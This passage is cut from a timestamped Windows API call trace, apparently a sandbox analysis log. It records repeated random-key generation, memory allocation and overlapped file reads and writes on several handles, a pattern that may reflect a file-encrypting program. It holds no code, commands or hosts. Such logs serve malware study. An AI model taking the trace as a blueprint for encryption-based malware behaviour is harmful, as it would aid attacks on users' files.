lpProcName="BCryptGenRandom") returned 0x753f1e2e [0147.213] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34afc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x34afc30) returned 0x0 [0147.213] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0147.214] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0147.214] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34af970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x34af970) returned 0x0 [0147.214] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0147.214] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0147.214] free (_Block=0x3e305b8) [0147.214] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0147.214] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0147.215] free (_Block=0x1fa91d0) [0147.215] free (_Block=0x1fa2ed8) [0147.215] free (_Block=0x1fa90b8) [0147.215] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0147.215] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0147.220] WriteFile (in: hFile=0x3cc, lpBuffer=0x3e7003c*, nNumberOfBytesToWrite=0x1d20, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 1 [0147.221] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0147.232] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0147.232] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0147.232] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34afc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x34afc30) returned 0x0 [0147.232] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0147.233] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0147.233] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34af970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x34af970) returned 0x0 [0147.233] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0147.233] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0147.233] free (_Block=0x3e305b8) [0147.233] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0147.233] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0147.234] free (_Block=0x1fa91d0) [0147.234] free (_Block=0x1fa2ed8) [0147.234] free (_Block=0x1fa90b8) [0147.234] WriteFile (in: hFile=0x2a8, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x618, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0147.234] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0147.245] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0147.246] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0147.246] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34afc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x34afc30) returned 0x0 [0147.246] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0147.246] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0147.246] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34af970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x34af970) returned 0x0 [0147.247] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0147.247] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0147.247] free (_Block=0x3e305b8) [0147.247] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0147.247] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0147.247] free (_Block=0x1fa91d0) [0147.247] free (_Block=0x1fa2ed8) [0147.247] free (_Block=0x1fa90b8) [0147.247] WriteFile (in: hFile=0x2a4, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x618, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0147.248] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0147.258] WriteFile (in: hFile=0x2a8, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x31a0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0147.258] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0147.259] WriteFile (in: hFile=0x2a4, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x16f0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0147.259] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0147.260] WriteFile (in: hFile=0x3cc, lpBuffer=0x3e7003c*, nNumberOfBytesToWrite=0x2610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 1 [0147.260] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0147.356] ReadFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x13ec, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0147.370] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0147.378] CloseHandle (hObject=0x3cc) returned 1 [0147.378] free (_Block=0x3df0008) [0147.378] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0147.385] WriteFile (in: hFile=0x2a4, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x61a0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0147.386] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0147.393] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0147.394] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0147.394] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34afc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x34afc30) returned 0x0 [0147.394] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0147.394] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0147.394] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34af970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x34af970) returned 0x0 [0147.394] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0147.394] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0147.395] free (_Block=0x3e305b8) [0147.395] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0147.395] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0147.466] free (_Block=0x1fa91d0) [0147.466] free (_Block=0x1fa2ed8) [0147.466] free (_Block=0x1fa90b8) [0147.466] WriteFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToWrite=0x612, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 0x0 [0147.467] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0147.468] WriteFile (in: hFile=0x3cc, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0xb130, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0147.469] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0147.542] ReadFile (in: hFile=0x170, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x7d26, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0147.557] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0147.566] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0147.567] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0147.567] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34afc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x34afc30) returned 0x0 [0147.567] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0147.568] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0147.568] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34af970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x34af970) returned 0x0 [0147.568] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0147.568] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0147.568] free (_Block=0x3e305b8) [0147.568] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0147.568] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0147.569] free (_Block=0x1fa91d0) [0147.569] free (_Block=0x1fa2ed8) [0147.569] free (_Block=0x1fa90b8) [0147.569] WriteFile (in: hFile=0x2a8, lpBuffer=0x3fb00ec*, nNumberOfBytesToWrite=0x612, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3fb00b8 | out: lpBuffer=0x3fb00ec*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3fb00b8) returned 1 [0147.569] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0147.585] WriteFile (in: hFile=0x3cc, lpBuffer=0x3d70484, nNumberOfBytesToWrite=0x8a10, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 0x0 [0147.586] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0147.601] ReadFile (in: hFile=0x338, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x40e7, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0147.617] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0147.643] CloseHandle (hObject=0x338) returned 1 [0147.643] free (_Block=0x3df0008) [0147.643] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0147.648] CloseHandle (hObject=0x170) returned 1 [0147.648] free (_Block=0x1ff1e60) [0147.648] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0147.649] CloseHandle (hObject=0xec) returned 1 [0147.649] free (_Block=0x3e70008) [0147.649] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0147.650] CloseHandle (hObject=0x3cc) returned 1 [0147.650] free (_Block=0x3d70450) [0147.650] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0147.650] CloseHandle (hObject=0x2a8) returned 1 [0147.650] free (_Block=0x3fb00b8) [0147.650] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0147.651] WriteFile (in: hFile=0x308, lpBuffer=0x3f7007c*, nNumberOfBytesToWrite=0x67b0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048) returned 1 [0147.651] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0147.732] ReadFile (in: hFile=0x2a8, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x6fd2, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0147.741] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0147.756] WriteFile (in: hFile=0x3cc, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x5f70, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0147.756] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0147.759] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0147.760] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0147.760] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34afc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x34afc30) returned 0x0 [0147.760] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0147.760] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0147.760] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34af970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x34af970) returned 0x0 [0147.760] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0147.760] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0147.760] free (_Block=0x3e305b8) [0147.760] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0147.760] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0147.761] free (_Block=0x1fa91d0) [0147.761] free (_Block=0x1fa2ed8) [0147.761] free (_Block=0x1fa90b8) [0147.761] WriteFile (in: hFile=0x308, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x618, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0147.761] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0147.771] WriteFile (in: hFile=0xec, lpBuffer=0x3e7003c*, nNumberOfBytesToWrite=0x4b50, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 1 [0147.771] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0147.786] WriteFile (in: hFile=0x308, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x1c90, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0147.786] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0147.795] ReadFile (in: hFile=0x3cc, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x4e46, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0147.802] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0147.814] CloseHandle (hObject=0x3cc) returned 1 [0147.814] free (_Block=0x1ff1e60) [0147.814] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0147.828] WriteFile (in: hFile=0x2a8, lpBuffer=0x3d70484, nNumberOfBytesToWrite=0x69e0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 0x0 [0147.828] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0147.832] ReadFile (in: hFile=0xec, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0xe956, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 1 [0147.834] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0149.264] ReadFile (in: hFile=0xec, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x1d94, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0149.278] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0150.013] CloseHandle (hObject=0x308) returned 1 [0150.014] free (_Block=0x3df0008) [0150.014] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0150.022] CloseHandle (hObject=0x2a8) returned 1 [0150.022] free (_Block=0x1ff1e60) [0150.022] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0150.031] CloseHandle (hObject=0x3cc) returned 1 [0150.032] free (_Block=0x3e70008) [0150.032] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0150.035] CloseHandle (hObject=0xec) returned 1 [0150.035] free (_Block=0x3d70450) [0150.035] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0150.036] CloseHandle (hObject=0x170) returned 1 [0150.037] free (_Block=0x3ef0008) [0150.037] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0150.037] WriteFile (in: hFile=0x308, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x73b0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0150.037] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0150.084] ReadFile (in: hFile=0x308, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x336a, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0150.085] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0150.102] ReadFile (in: hFile=0x170, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x1ca4, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0150.113] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0150.121] ReadFile (in: hFile=0x3cc, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0x207a, 